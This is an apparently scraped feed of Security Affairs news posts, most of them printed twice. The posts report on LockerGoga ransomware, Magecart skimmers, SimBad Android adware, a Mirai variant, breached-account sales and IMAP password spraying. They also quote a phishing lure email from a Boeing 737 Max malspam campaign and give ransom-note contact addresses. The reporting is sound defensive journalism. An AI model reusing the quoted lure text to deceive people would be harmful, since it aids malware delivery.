After encryption, it will drop a ransom note named README-NOW.txt on the desktop, which includes instructions to contact the SuzuMcpherson@protonmail.com or AsuxidOruraep1999@o2.pl email addresses for payment instructions.

6

Figure 9: Ransom note drooped by malware in user’s desktop.

After a memory analysis, no RSA or AES keys were noted in order to decrypt the targeted files. Nonetheless, good news for victims, the ransomware don’t affects Windows shadow copies.

Final Notes

In the recent past, several variants this ransomware have been noted. That way, it’s important for users and businesses to have their antivirus fully updated with recent malware signatures.

SI-LAB also has available a YARA rule which allows a more effective scan to detect threats this nature.

Further technical details, including Indicators of Compromise (IoCs) and Yara rules are reported in the analysis published by Pedro Tavares:

About the author Pedro Tavares:

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog seguranca–informatica.pt.

Pierluigi Paganini

(SecurityAffairs – LockerGoga, ransomware)

The post [SI-LAB] LockerGoga is the most active ransomware that focuses on targeting companies appeared first on Security Affairs.



Security Affairs

MyPillow and Amerisleep are the latest victims of Magecart gangs

Security experts at riskIQ revealed today that another two organizations were victims of Magecart crime gang, the bedding retailers MyPillow and Amerisleep.

Security experts at RiskIQ announced that the two bedding retailers MyPillow and Amerisleep were victims of the Magecart cybercrime gang.

The Magecart umbrella includes at least 11 different hacking crews that has been active at least since 2015. The gangs use to implant skimming script into compromised online stores in order to steal payment card data on, but they are quite different from each other. 

The list of victims of Magecart groups is long and includes several major platforms such as British AirwaysNeweggTicketmaster, and Feedify​​

Now RiskIQ published a report that discloses two new credit-card breaches associated with Magecart threat actors. Hackers stole payment card data from online bedding retailers MyPillow and Amerisleep by implanting a digital skimming code on both websites. One of the incidents has never been disclosed, the other was solved.

“In this blog, we’ll document two Magecart-related breaches against bedding retailers MyPillow and Amerisleep.” reads the advisory published by RiskIQ. “One has been resolved but was never disclosed and another is ongoing despite numerous attempts by us to contact the affected retailer. In both cases, the potential victims of credit card fraud, the consumers, have not been informed.”

Magecart skimmer

MyPillow website was compromised in October 2018, in this case, crooks inserted a skimming code on the site that was hosted on a look-alike domain (mypiltow[.]com), a typo-squat on the legitimate domain of MyPillow, and using a certificate issued by LetsEncrypt.

The skimming script remained on the website from October 1st to November 19th.

The second company hit by the Magecart gang is Amerisleep, it was targeted by same crews multiple times in 2017. The latest attack dates back December 2018, when Magecart compromised the website injecting skimmers contained on a Github account.

The latest attack against Amerisleep was discovered in January, experts noticed that the skimming scripts were injected by the attackers only on payment pages.

“In December 2018, the attackers had used a new skimming setup with a fascinating new method. The attackers abused Github by registering a Github account called “amerisleep” and creating the Github Pages address amerisleep.github.io.” continues the post.

“This skimming method quickly disappeared.” “Starting in January, we observed a different skimmer that Magecart actors injected with some conditional checks to ensure the script would only go on payment pages. Formerly, the skimmers themselves would check to see if they were already on an active payment page.”

Experts noticed that the skimmer domain has been taken offline, but that the injection is still live on the website as of the publishing of the report.

“Magecart has capitalized on the fact that the security controls of small companies who provide services to enhance the websites of global brands are far less developed than the security controls of the global brands themselves.” concludes the report.

“Businesses need to focus on visibility into internet-facing attack surfaces and increase scrutiny of third-party services that form an integral part of modern web applications. The reputation of organizations that run payment forms online and the overall confidence of online shoppers is at stake.”

Pierluigi Paganini

(SecurityAffairs – Magecart, hacking )

The post MyPillow and Amerisleep are the latest victims of Magecart gangs appeared first on Security Affairs.

SimBad malware infected million Android users through Play Store

Security experts at Check Point uncovered a sophisticated malware campaign spreading the SimBad malicious code through the official Google Play Store.

Researchers at Check Point have uncovered a sophisticated malware campaign spreading the SimBad agent through the official Google Play Store. According to experts, more than 150 million users were already impacted.

SimBad disguises itself as ads, it is hidden in the RXDrioder software development kit (SDK) used for advertising purposes and monetization generation. Every application developed using the tainted SDK includes the malicious code.

“The malware resides within the ‘RXDrioder’ Software Development Kit (SDK), which is provided by ‘addroider[.]com’ as an ad-related SDK. We believe the developers were scammed to use this malicious SDK, unaware of its content, leading to the fact that this campaign was not targeting a specific county or developed by the same developer.” reads the analysis published by the experts.

“The malware has been dubbed ‘SimBad’ due to the fact that a large portion of the infected applications are simulator games.”

The domain ‘addroider[.]com’ was registered via GoDaddy the ownership is masqueraded by the privacy protection service, RiskIQ’s PassiveTotal reveals that the domain expired 7 months ago.  By accessing the domain users get a login page that appears similar to other malware panels. The ‘Register’ and ‘Sign Up’ links are broken and ‘redirects’ the user back to the login page.

The SimBad malware is also able to redirect Android users to compromised phishing websites and to download more malicious applications either from the Play Store or from a remote server.

Once an Android user downloads and installs an infected application, the SimBad malware registers itself to the ‘BOOT_COMPLETE’ and ‘USER_PRESENT’ intents. In this way, the malware could perform actions once the booting phase has been completed, while the unaware user is using his device.

Once installed, SimBad malware will connect to the Command and Control (C&C) server, and receives a command to perform. It removes its icon from the launcher, thus making it harder for the user to uninstall the malicious app, at the same time it starts to display background ads and open a browser with a given URL to generate fraudulent revenue without raising suspicion.

“‘SimBad’ has capabilities that can be divided into three groups – Show Ads, Phishing, and Exposure to other applications. With the capability to open a given URL in a browser, the actor behind ‘SimBad’ can generate phishing pages for multiple platforms and open them in a browser, thus performing spear-phishing attacks on the user.” continues the expert.

“With the capability to open market applications, such as Google Play and 9Apps, with a specific keyword search or even a single application’s page, the actor can gain exposure for other threat actors and increase his profits. The actor can even take his malicious activities to the next level by installing a remote application from a designated server, thus allowing him to install new malware once it is required.”

SimBad

According to Check Point, Most of the infected applications are simulator games, followed by photo editors and wallpapers applications. Below the list of top 10 apps infected with SimBad malware:

  1. Snow Heavy Excavator Simulator (10,000,000 downloads)
  2. Hoverboard Racing (5,000,000 downloads)
  3. Real Tractor Farming Simulator (5,000,000 downloads)
  4. Ambulance Rescue Driving (5,000,000 downloads)
  5. Heavy Mountain Bus Simulator 2018 (5,000,000 downloads)
  6. Fire Truck Emergency Driver (5,000,000 downloads)
  7. Farming Tractor Real Harvest Simulator (5,000,000 downloads)
  8. Car Parking Challenge (5,000,000 downloads)
  9. Speed Boat Jet Ski Racing (5,000,000 downloads)
  10. Water Surfing Car Stunt (5,000,000 downloads)

The full list of malware-infected apps is available here

This is the campaign in order of time leveraging the Google store, previously reported massive attacks involved CopyCat and Gooligan malware.

Pierluigi Paganini

(SecurityAffairs – SimBad, Android)

The post SimBad malware infected million Android users through Play Store appeared first on Security Affairs.

Security Affairs: SimBad malware infected million Android users through Play Store

Security experts at Check Point uncovered a sophisticated malware campaign spreading the SimBad malicious code through the official Google Play Store.

Researchers at Check Point have uncovered a sophisticated malware campaign spreading the SimBad agent through the official Google Play Store. According to experts, more than 150 million users were already impacted.

SimBad disguises itself as ads, it is hidden in the RXDrioder software development kit (SDK) used for advertising purposes and monetization generation. Every application developed using the tainted SDK includes the malicious code.

“The malware resides within the ‘RXDrioder’ Software Development Kit (SDK), which is provided by ‘addroider[.]com’ as an ad-related SDK. We believe the developers were scammed to use this malicious SDK, unaware of its content, leading to the fact that this campaign was not targeting a specific county or developed by the same developer.” reads the analysis published by the experts.

“The malware has been dubbed ‘SimBad’ due to the fact that a large portion of the infected applications are simulator games.”

The domain ‘addroider[.]com’ was registered via GoDaddy the ownership is masqueraded by the privacy protection service, RiskIQ’s PassiveTotal reveals that the domain expired 7 months ago.  By accessing the domain users get a login page that appears similar to other malware panels. The ‘Register’ and ‘Sign Up’ links are broken and ‘redirects’ the user back to the login page.

The SimBad malware is also able to redirect Android users to compromised phishing websites and to download more malicious applications either from the Play Store or from a remote server.

Once an Android user downloads and installs an infected application, the SimBad malware registers itself to the ‘BOOT_COMPLETE’ and ‘USER_PRESENT’ intents. In this way, the malware could perform actions once the booting phase has been completed, while the unaware user is using his device.

Once installed, SimBad malware will connect to the Command and Control (C&C) server, and receives a command to perform. It removes its icon from the launcher, thus making it harder for the user to uninstall the malicious app, at the same time it starts to display background ads and open a browser with a given URL to generate fraudulent revenue without raising suspicion.

“‘SimBad’ has capabilities that can be divided into three groups – Show Ads, Phishing, and Exposure to other applications. With the capability to open a given URL in a browser, the actor behind ‘SimBad’ can generate phishing pages for multiple platforms and open them in a browser, thus performing spear-phishing attacks on the user.” continues the expert.

“With the capability to open market applications, such as Google Play and 9Apps, with a specific keyword search or even a single application’s page, the actor can gain exposure for other threat actors and increase his profits. The actor can even take his malicious activities to the next level by installing a remote application from a designated server, thus allowing him to install new malware once it is required.”

SimBad

According to Check Point, Most of the infected applications are simulator games, followed by photo editors and wallpapers applications. Below the list of top 10 apps infected with SimBad malware:

  1. Snow Heavy Excavator Simulator (10,000,000 downloads)
  2. Hoverboard Racing (5,000,000 downloads)
  3. Real Tractor Farming Simulator (5,000,000 downloads)
  4. Ambulance Rescue Driving (5,000,000 downloads)
  5. Heavy Mountain Bus Simulator 2018 (5,000,000 downloads)
  6. Fire Truck Emergency Driver (5,000,000 downloads)
  7. Farming Tractor Real Harvest Simulator (5,000,000 downloads)
  8. Car Parking Challenge (5,000,000 downloads)
  9. Speed Boat Jet Ski Racing (5,000,000 downloads)
  10. Water Surfing Car Stunt (5,000,000 downloads)

The full list of malware-infected apps is available here

This is the campaign in order of time leveraging the Google store, previously reported massive attacks involved CopyCat and Gooligan malware.

Pierluigi Paganini

(SecurityAffairs – SimBad, Android)

The post SimBad malware infected million Android users through Play Store appeared first on Security Affairs.



Security Affairs

Cyber war is here, according to 87% of security professionals

A study from Venafi has concluded that the world is in the midst of a cyber war, with 72% of respondents believing nation-states have right to ‘hack back’ cybercriminals. The

The post Cyber war is here, according to 87% of security professionals appeared first on The Cyber Security Place.

A new development shows a potential shift to using Mirai to target enterprises

PaloAlto Networks researchers discovered a new variant of the infamous Mirai botnet is targeting IoT devices belonging to businesses.

Researchers at PaloAlto Networks spotted a new variant of the infamous Mirai botnet is targeting IoT devices belonging to businesses.

Mirai malware first appeared in the wild in 2016 when the expert MalwareMustDie discovered it in massive attacks aimed at Internet of Things (IoT) devices.

mirai

Since the code of the Mirai botnet was leaked online many variants emerged in the threat landscape. SatoriMasutaWicked MiraiJenX, Omni, and the OMG botnet are just the last variants appeared online in 2018.

A variant discovered last year was leveraging an open-source project to target multiple architectures, including ARM, MIPS, PowerPC, and x86.

The new Mirai variant targets embedded devices (i.e. routers, network storage devices, NVRs, and IP cameras) and leverages various exploits to hack them.

Experts observed attacks against WePresent WiPG-1000 Wireless Presentation systems and LG Supersign TVs, both families of devices intended for use within business environments.

“In particular, Unit 42 found this new variant targeting WePresent WiPG-1000 Wireless Presentation systems, and in LG Supersign TVs. Both these devices are intended for use by businesses. This development indicates to us a potential shift to using Mirai to target enterprises.” Palo Alto Networks notes

“The previous instance where we observed the botnet targeting enterprise vulnerabilities was with the incorporation of exploits against Apache Struts and SonicWall,”

The malicious code was hosted at a compromised website in Colombia: an “Electronic security, integration and alarm monitoring” business.

Researchers discovered that the new Mirai variant uses a total of 27 exploits, 11 of them are new to the threat. The bot can also leverage a new set of credentials to use while carrying out brute force attacks.

The new malware implements the same encryption scheme characteristic of Mirai, it is also able to scan for vulnerable devices and launch HTTP Flood DDoS attacks.

The samples analyzed by the experts were fetching the same payload hosted at the same IP that had been hosting some Gafgyt samples just a few days before, and that these used the same name as the binaries fetched by the shell script.

“IoT/Linux botnets continue to expand their attack surface, either by the incorporation of multiple exploits targeting a plethora of devices, or by adding to the list of default credentials they brute force, or both.”
Palo Alto Networks concludes. “In addition, targeting enterprise vulnerabilities allows them access to links with potentially larger bandwidth than consumer device links, affording them greater firepower for DDoS attacks,”

Further details, including IoCs are reported in the analysis published by PaloAlto Networks.

Pierluigi Paganini

(SecurityAffairs – Mirai, IoT)

The post A new development shows a potential shift to using Mirai to target enterprises appeared first on Security Affairs.

Security Affairs: A new development shows a potential shift to using Mirai to target enterprises

PaloAlto Networks researchers discovered a new variant of the infamous Mirai botnet is targeting IoT devices belonging to businesses.

Researchers at PaloAlto Networks spotted a new variant of the infamous Mirai botnet is targeting IoT devices belonging to businesses.

Mirai malware first appeared in the wild in 2016 when the expert MalwareMustDie discovered it in massive attacks aimed at Internet of Things (IoT) devices.

mirai

Since the code of the Mirai botnet was leaked online many variants emerged in the threat landscape. SatoriMasutaWicked MiraiJenX, Omni, and the OMG botnet are just the last variants appeared online in 2018.

A variant discovered last year was leveraging an open-source project to target multiple architectures, including ARM, MIPS, PowerPC, and x86.

The new Mirai variant targets embedded devices (i.e. routers, network storage devices, NVRs, and IP cameras) and leverages various exploits to hack them.

Experts observed attacks against WePresent WiPG-1000 Wireless Presentation systems and LG Supersign TVs, both families of devices intended for use within business environments.

“In particular, Unit 42 found this new variant targeting WePresent WiPG-1000 Wireless Presentation systems, and in LG Supersign TVs. Both these devices are intended for use by businesses. This development indicates to us a potential shift to using Mirai to target enterprises.” Palo Alto Networks notes

“The previous instance where we observed the botnet targeting enterprise vulnerabilities was with the incorporation of exploits against Apache Struts and SonicWall,”

The malicious code was hosted at a compromised website in Colombia: an “Electronic security, integration and alarm monitoring” business.

Researchers discovered that the new Mirai variant uses a total of 27 exploits, 11 of them are new to the threat. The bot can also leverage a new set of credentials to use while carrying out brute force attacks.

The new malware implements the same encryption scheme characteristic of Mirai, it is also able to scan for vulnerable devices and launch HTTP Flood DDoS attacks.

The samples analyzed by the experts were fetching the same payload hosted at the same IP that had been hosting some Gafgyt samples just a few days before, and that these used the same name as the binaries fetched by the shell script.

“IoT/Linux botnets continue to expand their attack surface, either by the incorporation of multiple exploits targeting a plethora of devices, or by adding to the list of default credentials they brute force, or both.”
Palo Alto Networks concludes. “In addition, targeting enterprise vulnerabilities allows them access to links with potentially larger bandwidth than consumer device links, affording them greater firepower for DDoS attacks,”

Further details, including IoCs are reported in the analysis published by PaloAlto Networks.

Pierluigi Paganini

(SecurityAffairs – Mirai, IoT)

The post A new development shows a potential shift to using Mirai to target enterprises appeared first on Security Affairs.



Security Affairs

Security Affairs: Google took down 2.3 billion bad ads in 2018,including 58.8M phishing ads

Google recently shared details about its efforts against malicious advertisement, the giant took down 2.3 billion bad ads last year.

Google revealed that it took down 2.3 billion bad ads in 2018, including 58.8 million phishing ads for violation of its policies.

Google introduced 31 new ads policies in 2018, aiming at protecting users from scams and other fraudulent activities (i.e. third-party tech support, ticket resellers, and crypto-currency).

Some of the policies added by Google in 2018 include the ban of ads from for-profit bail bond providers that were abused for taking advantage of vulnerable communities.

“In all, we introduced 31 new ads policies in 2018 to address abuses in areas including third-party tech support, ticket resellers, cryptocurrency and local services such as garage door repairmen, bail bonds and addiction treatment facilities.” reads the press release published by Google.

“We took down 2.3 billion bad ads in 2018 for violations of both new and existing policies, including nearly 207,000 ads for ticket resellers, over 531,000 ads for bail bonds and approximately 58.8 million phishing ads. Overall, that’s more than six million bad ads, every day.”

Malicious ads that Google took down in 2018 include nearly 207,000 ads for ticket resellers and over 531,000 ads for bail bonds.

Google announced it will launch next month a new policy manager in Google Ads that will give tips to advertisers to avoid common policy mistakes.

Google also revealed it was able to identify threat actors behind bad ads with the help of improved machine learning technology, it terminated nearly one million bad advertiser accounts.

“When we take action at the account level, it helps to address the root cause of bad ads and better protect our users,” continues Google.

In 2017, Google launched new technology for more granular analysis of ads, one year later the company launched 330 detection classifiers to help us better detect “badness” at the page level (nearly three times the number of classifiers launched in 2017 by the tech giant).

“So while we terminated nearly 734,000 publishers and app developers from our ad network, and removed ads completely from nearly 1.5 million apps, we were also able to take more granular action by taking ads off of nearly 28 million pages” Google adds.

Last year, Google introduced a new policy specifically created for election ads in the U.S. ahead of the 2018 midterm elections. The company aimed at preventing misinformation and fake news, it verified nearly 143,000 election ads, similar tools are being launched ahead of elections in the EU and India.

Google removed ads from approximately 1.2 million pages, more than 22,000 apps, and nearly 15,000 sites last year.

Ads from almost 74,000 pages were removed for violating their “dangerous or derogatory” content policy. 190,000 ads were taken down for violating this policy.

In 2018, Google helped the FBI, along with the cyber-security firm White Ops, to take down a sophisticated ad fraud scheme called ‘3ve’ that allowed its operators to earn tens of millions of dollars. 3ve infected over 1.7 million computers to carry out advertising frauds.

Pierluigi Paganini

(SecurityAffairs – malicious ads, Google)

The post Google took down 2.3 billion bad ads in 2018,including 58.8M phishing ads appeared first on Security Affairs.



Security Affairs

Google took down 2.3 billion bad ads in 2018,including 58.8M phishing ads

Google recently shared details about its efforts against malicious advertisement, the giant took down 2.3 billion bad ads last year.

Google revealed that it took down 2.3 billion bad ads in 2018, including 58.8 million phishing ads for violation of its policies.

Google introduced 31 new ads policies in 2018, aiming at protecting users from scams and other fraudulent activities (i.e. third-party tech support, ticket resellers, and crypto-currency).

Some of the policies added by Google in 2018 include the ban of ads from for-profit bail bond providers that were abused for taking advantage of vulnerable communities.

“In all, we introduced 31 new ads policies in 2018 to address abuses in areas including third-party tech support, ticket resellers, cryptocurrency and local services such as garage door repairmen, bail bonds and addiction treatment facilities.” reads the press release published by Google.

“We took down 2.3 billion bad ads in 2018 for violations of both new and existing policies, including nearly 207,000 ads for ticket resellers, over 531,000 ads for bail bonds and approximately 58.8 million phishing ads. Overall, that’s more than six million bad ads, every day.”

Malicious ads that Google took down in 2018 include nearly 207,000 ads for ticket resellers and over 531,000 ads for bail bonds.

Google announced it will launch next month a new policy manager in Google Ads that will give tips to advertisers to avoid common policy mistakes.

Google also revealed it was able to identify threat actors behind bad ads with the help of improved machine learning technology, it terminated nearly one million bad advertiser accounts.

“When we take action at the account level, it helps to address the root cause of bad ads and better protect our users,” continues Google.

In 2017, Google launched new technology for more granular analysis of ads, one year later the company launched 330 detection classifiers to help us better detect “badness” at the page level (nearly three times the number of classifiers launched in 2017 by the tech giant).

“So while we terminated nearly 734,000 publishers and app developers from our ad network, and removed ads completely from nearly 1.5 million apps, we were also able to take more granular action by taking ads off of nearly 28 million pages” Google adds.

Last year, Google introduced a new policy specifically created for election ads in the U.S. ahead of the 2018 midterm elections. The company aimed at preventing misinformation and fake news, it verified nearly 143,000 election ads, similar tools are being launched ahead of elections in the EU and India.

Google removed ads from approximately 1.2 million pages, more than 22,000 apps, and nearly 15,000 sites last year.

Ads from almost 74,000 pages were removed for violating their “dangerous or derogatory” content policy. 190,000 ads were taken down for violating this policy.

In 2018, Google helped the FBI, along with the cyber-security firm White Ops, to take down a sophisticated ad fraud scheme called ‘3ve’ that allowed its operators to earn tens of millions of dollars. 3ve infected over 1.7 million computers to carry out advertising frauds.

Pierluigi Paganini

(SecurityAffairs – malicious ads, Google)

The post Google took down 2.3 billion bad ads in 2018,including 58.8M phishing ads appeared first on Security Affairs.

gnosticplayers offers 26 Million new accounts for sale on the Dark Web

The hacker gnosticplayers is offering the fourth batch of millions of records stolen from 6 new websites for sale on the dark web.

Gnosticplayers is back with the fourth round of hacked accounts offered for sale on the dark web.

In February, the hacker who goes by online with the moniker Gnosticplayers disclosed the existence of some massive unreported data breaches in three rounds. The experts offered for sale the huge trove of data for a limited period of time.

In a first round, the seller listed a batch of 620 million accounts coming from 16 breached websites including Dubsmash, Armor Games, 500px, Whitepages, and ShareThis. A few days later, Gnosticplayers offered a new batch of 127 million records originated from eight companies.

The third round contained more than 92 million hacked users’ accounts from 8 new websites, including the GIF hosting platform Gfycat.

Now the hacker is offering the fourth batch of millions of records stolen from 6 new websites for sale on the dark web.

Gnosticplayers listing

Gnosticplayers in an exclusive conversation with HACKREAD claimed to be a Pakistani citizen, a hacktivist fighting to put a positive image of his country.

Now the hacker contacted The Hacker News via email to announce the availability of the fourth batch of data he claimed to have obtained from dozens of popular websites.

The fourth round is available for sale on the DreamMarket marketplace, stolen records belong to the following 8 hacked websites:

  1. Youthmanual — Indonesian college and career platform — 1.12 million accounts
  2. GameSalad — Online learning platform —1.5 million accounts
  3. Bukalapak — Online Shopping Site — 13 million accounts
  4. Lifebear — Japanese Online Notebook — 3.86 million accounts
  5. EstanteVirtual — Online Bookstore — 5.45 Million accounts
  6. Coubic — Appointment Scheduling — 1.5 million accounts

The hacker is offering for sale the above databases individually for 1.2431 Bitcoin (roughly $5,000).

It is not clear if the administrators of the above websites are aware that their data are available for sale on the black marketplace, for sure they haven’t previously disclosed any data breach.

Users of the web services listed in the four rounds are recommended to change their passwords on those websites and any other service for which they use the same credentials.

Pierluigi Paganini

(SecurityAffairs – gnosticplayers, dark web)

The post gnosticplayers offers 26 Million new accounts for sale on the Dark Web appeared first on Security Affairs.

Security Affairs: gnosticplayers offers 26 Million new accounts for sale on the Dark Web

The hacker gnosticplayers is offering the fourth batch of millions of records stolen from 6 new websites for sale on the dark web.

Gnosticplayers is back with the fourth round of hacked accounts offered for sale on the dark web.

In February, the hacker who goes by online with the moniker Gnosticplayers disclosed the existence of some massive unreported data breaches in three rounds. The experts offered for sale the huge trove of data for a limited period of time.

In a first round, the seller listed a batch of 620 million accounts coming from 16 breached websites including Dubsmash, Armor Games, 500px, Whitepages, and ShareThis. A few days later, Gnosticplayers offered a new batch of 127 million records originated from eight companies.

The third round contained more than 92 million hacked users’ accounts from 8 new websites, including the GIF hosting platform Gfycat.

Now the hacker is offering the fourth batch of millions of records stolen from 6 new websites for sale on the dark web.

Gnosticplayers listing

Gnosticplayers in an exclusive conversation with HACKREAD claimed to be a Pakistani citizen, a hacktivist fighting to put a positive image of his country.

Now the hacker contacted The Hacker News via email to announce the availability of the fourth batch of data he claimed to have obtained from dozens of popular websites.

The fourth round is available for sale on the DreamMarket marketplace, stolen records belong to the following 8 hacked websites:

  1. Youthmanual — Indonesian college and career platform — 1.12 million accounts
  2. GameSalad — Online learning platform —1.5 million accounts
  3. Bukalapak — Online Shopping Site — 13 million accounts
  4. Lifebear — Japanese Online Notebook — 3.86 million accounts
  5. EstanteVirtual — Online Bookstore — 5.45 Million accounts
  6. Coubic — Appointment Scheduling — 1.5 million accounts

The hacker is offering for sale the above databases individually for 1.2431 Bitcoin (roughly $5,000).

It is not clear if the administrators of the above websites are aware that their data are available for sale on the black marketplace, for sure they haven’t previously disclosed any data breach.

Users of the web services listed in the four rounds are recommended to change their passwords on those websites and any other service for which they use the same credentials.

Pierluigi Paganini

(SecurityAffairs – gnosticplayers, dark web)

The post gnosticplayers offers 26 Million new accounts for sale on the Dark Web appeared first on Security Affairs.



Security Affairs

Experts uncovered a malspam campaign using Boeing 737 Max crashes

Experts at the 360 Threat Intelligence Center uncovered a new malspam campaign that leverages the tragic Boeing 737 Max crash to spread malware.

Crooks always attempt to exploit the attention of the people on the events that made the headlines. In the last days, two events captured the attention of the media, the New Zealand mosque shooting and the tragic crash of the Boeing 737 Max in Ethiopia,

In the wake of the New Zealand mosque shooting, US CISA is recommending users to remain vigilant on possible scams and malware attacks.

Now experts at the 360 Threat Intelligence Center have uncovered a new malspam campaign that leverages the tragic Boeing 737 Max crash to spread malware. Crooks used spam messages that pretend to be leaked documents about possible crashes of the Boeing 737 Max.

Crooks are using #Boeing hashtag in their campaign, spam messages were sent by the allegedly compromised email account at @IsgecPresses (info@isgec.com).

Threat actors are using a JAR file as an attachment (i.e. MP4_142019.jar) that acts as a dropper for the Houdini H-WORM RAT, spam emails have subject lines similar to “Fwd: Airlines plane crash Boeing 737 Max 8“.

spam boeing 737 max-

These emails pretend to be from a private intelligence analyst who found a leaked document on the dark web. This document pretends to contain information about other airline companies will be affected by similar crashes soon. 

Below the text used by crooks that was shared by BleepingComputer.

Greetings 

I believe you have heard about the latest crash Boeing 737 MAX 8 which happen on sunday 10 march 2019, All  passengers and crew were killed in the accident

Ethiopian Airlines Flight ET302 from Addis Ababa, Ethiopia, to Nairobi, Kenya, crashed shortly after takeoff 

The dead were of 35 different nationalities, including eight Americans.

On 29 October 2018, the Boeing 737 MAX 8 operating the route crashed into the Java Sea 12 minutes after takeoff.

All 189 passengers and crew were killed in the accident.

note: there was a leak information from Darkweb which listed all the airline companies that will go down soon.

kindly notify your love ones about the informations on these file.
 
Regards

Joshua Berlinger 
private inteligent analyst

If a user attempts to open the JAR file, it will be executed by JAVA on the computer. This attachment was originally thought to only install the Houdini H-worm Remote Access Trojan, but security

Security researcher Racco42 analyzed the JAR file after noticing its anomalous size and discovered running it through Any.Run that the malware was also installing the Adwind data-stealer Trojan.

Pierluigi Paganini

(SecurityAffairs – Boeing 737 Max, malspam)

The post Experts uncovered a malspam campaign using Boeing 737 Max crashes appeared first on Security Affairs.

Security Affairs: Experts uncovered a malspam campaign using Boeing 737 Max crashes

Experts at the 360 Threat Intelligence Center uncovered a new malspam campaign that leverages the tragic Boeing 737 Max crash to spread malware.

Crooks always attempt to exploit the attention of the people on the events that made the headlines. In the last days, two events captured the attention of the media, the New Zealand mosque shooting and the tragic crash of the Boeing 737 Max in Ethiopia,

In the wake of the New Zealand mosque shooting, US CISA is recommending users to remain vigilant on possible scams and malware attacks.

Now experts at the 360 Threat Intelligence Center have uncovered a new malspam campaign that leverages the tragic Boeing 737 Max crash to spread malware. Crooks used spam messages that pretend to be leaked documents about possible crashes of the Boeing 737 Max.

Crooks are using #Boeing hashtag in their campaign, spam messages were sent by the allegedly compromised email account at @IsgecPresses (info@isgec.com).

Threat actors are using a JAR file as an attachment (i.e. MP4_142019.jar) that acts as a dropper for the Houdini H-WORM RAT, spam emails have subject lines similar to “Fwd: Airlines plane crash Boeing 737 Max 8“.

spam boeing 737 max-

These emails pretend to be from a private intelligence analyst who found a leaked document on the dark web. This document pretends to contain information about other airline companies will be affected by similar crashes soon. 

Below the text used by crooks that was shared by BleepingComputer.

Greetings 

I believe you have heard about the latest crash Boeing 737 MAX 8 which happen on sunday 10 march 2019, All  passengers and crew were killed in the accident

Ethiopian Airlines Flight ET302 from Addis Ababa, Ethiopia, to Nairobi, Kenya, crashed shortly after takeoff 

The dead were of 35 different nationalities, including eight Americans.

On 29 October 2018, the Boeing 737 MAX 8 operating the route crashed into the Java Sea 12 minutes after takeoff.

All 189 passengers and crew were killed in the accident.

note: there was a leak information from Darkweb which listed all the airline companies that will go down soon.

kindly notify your love ones about the informations on these file.
 
Regards

Joshua Berlinger 
private inteligent analyst

If a user attempts to open the JAR file, it will be executed by JAVA on the computer. This attachment was originally thought to only install the Houdini H-worm Remote Access Trojan, but security

Security researcher Racco42 analyzed the JAR file after noticing its anomalous size and discovered running it through Any.Run that the malware was also installing the Adwind data-stealer Trojan.

Pierluigi Paganini

(SecurityAffairs – Boeing 737 Max, malspam)

The post Experts uncovered a malspam campaign using Boeing 737 Max crashes appeared first on Security Affairs.



Security Affairs

Massive attacks bypass MFA on Office 365 and G Suite accounts via IMAP Protocol

Threat actors targeted Office 365 and G Suite cloud accounts using the IMAP protocol to bypass multi-factor authentication (MFA).

Over the past months, threat actors have targeted Office 365 and G Suite cloud accounts using the IMAP protocol to bypass multi-factor authentication (MFA).

Experts at Proofpoint conducted an interesting study of massive attacks against accounts of major cloud services, The experts noticed that attackers leverage legacy protocols and credential dumps to increase the efficiency of massive brute force attacks.

Attacks against Office 365 and G Suite cloud accounts using IMAP are difficult to protect against with multi-factor authentication, where service accounts and shared mailboxes are notably vulnerable.” reads the study published by Proofpoint. “At the same time, targeted, intelligent brute force attacks brought a new approach to traditional password-spraying, employing common variations of the usernames and passwords exposed in large credential dumps to compromise accounts.”

The experts analyzed over one hundred thousand unauthorized logins across millions of monitored cloud user-accounts, below key findings from the study:

  • 72% of tenants were targeted at least once by threat actors  
  • 40% of tenants had at least one compromised account in their environment  
  • Over 2% of active user-accounts were targeted by malicious actors 
  • 15 out of every 10,000 active user-accounts were successfully breached by attackers 

The attacker’s primary goal is to carry out internal phishing, especially when the initial target does not have the access needed to transfer money or data. The access to a cloud account could be exploited by attackers for lateral movements and to expand footholds within an organization via internal phishing and internal BEC. Experts observed that compromised accounts are also used to launch external attacks.    

Giving a look at the sources of the attacks, most of them come from Nigerian IP addresses (40%), followed by Chinese IP addresses (26%).

According to the study, IMAP was the most abused legacy protocol. IMAP is a legacy authentication protocol that bypasses multifactor authentication (MFA). Experts pointed out that these attacks avoid account lock-out and appear as isolated failed logins and for this reason, they are hard to detect.

Below other data provided by the experts:

  • Approximately 60% of Microsoft Office 365 and G Suite tenants were targeted with IMAP-based password-spraying attacks 
  • Roughly 25% of Office 365 and G Suite tenants experienced a successful breach as a result 
  • Threat actors achieved a 44% success rate breaching an account at a targeted organization 

The experts observed a large number of IMAP-based password-spraying campaigns between September 2018 and February 2019. Proofpoint reported that 10% of active user accounts in targeted tenants were hit and 1% of targeted user accounts were successfully breached.

IMAP protocol attacks phishing

The attackers leveraged a botnet composed of thousands of hijacked network devices (i.e. routers, servers) to launch the attacks.

“These hijacked devices gained access to a new tenant every 2.5 days on average during a 50-day period,” continues Proofpoint.

China was the source for the vast majority of the IMAP-based attacks (53%), followed by Brazil (39%) and the United States (31%).

Most of the attacks (63%) originated from Nigerian IP addresses, followed by South African infrastructure (21%), and the United States via VPNs (11%).

This study demonstrates the increasing sophistication of threat actors around the world who are leveraging brute force methods, massive credential dumps, and successful phishing attacks to compromise cloud accounts at unprecedented scale. Service accounts and shared mailboxes are particularly vulnerable while multifactor authentication has proven vulnerable.” concludes the study.

“Attackers parlay successful compromises into internal phishing attacks, lateral movement in organizations, and additional compromises at trusted external organizations.”

Pierluigi Paganini

(SecurityAffairs – IMAP, hacking)

The post Massive attacks bypass MFA on Office 365 and G Suite accounts via IMAP Protocol appeared first on Security Affairs.

Security Affairs: Massive attacks bypass MFA on Office 365 and G Suite accounts via IMAP Protocol

Threat actors targeted Office 365 and G Suite cloud accounts using the IMAP protocol to bypass multi-factor authentication (MFA).

Over the past months, threat actors have targeted Office 365 and G Suite cloud accounts using the IMAP protocol to bypass multi-factor authentication (MFA).

Experts at Proofpoint conducted an interesting study of massive attacks against accounts of major cloud services, The experts noticed that attackers leverage legacy protocols and credential dumps to increase the efficiency of massive brute force attacks.

